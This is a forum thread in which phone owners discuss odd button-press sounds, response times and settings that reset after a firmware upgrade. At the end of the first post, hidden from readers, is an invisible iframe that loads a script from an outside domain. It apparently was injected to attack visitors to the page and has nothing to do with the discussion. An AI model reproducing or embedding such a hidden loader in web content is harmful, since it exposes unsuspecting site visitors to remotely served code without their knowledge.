Button Sounds After Firmware Upgrade

To those who have upgraded ... what sound do your button presses make? Mine went from "clicks" before the upgrade to something that sounds like wires shorting (although faint) after the upgrade.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I use TechSounds and have that silly clicking turned off. However, on yours, maybe the volume was reset after your firmware upgrade. Try increasing the volume and hear what it sounds like. I know volume level on my 7135 makes a difference in what it sounds like.

No, that's not the problem. It's a different sound altogether, not clicks but like wires frying.

Yep. Mind sounds like some funky clicks or something. I also noticed it didn't sound like that before the upgrade. Doesn't bother me too much though.

It's not particularly bothersome, just checking with y'all.

This is interesting. One of the problems with this phone was it's use of sound files as tones or clicks. By using clicks, we get a faster button response time (though still far slower than even the worst of cell phones).

Could this new firmware have changed this? Are your button response times better?

clicks? hrm?

I never use the click sounds, I have all my sounds turned off, except alarms.

Buttom responce times? Mine seem fine. Did a test side by side with my old startac and they seem the same. Never had as issue with button times. But for that matter I don't find the buttons hard to press like some here do, and I have large stubby hands.

I had something similar happen (maybe even the same thing). I had my button sounds turned off and when I upgraded, they were back on. I had to change the setting, save it, and reset it back to what I had to make the sounds go away. Evidently there's a bit of "schmutz" that gets stored in the wrong area of memory and changing the setting back and forth fixes it.

Hope that helps...
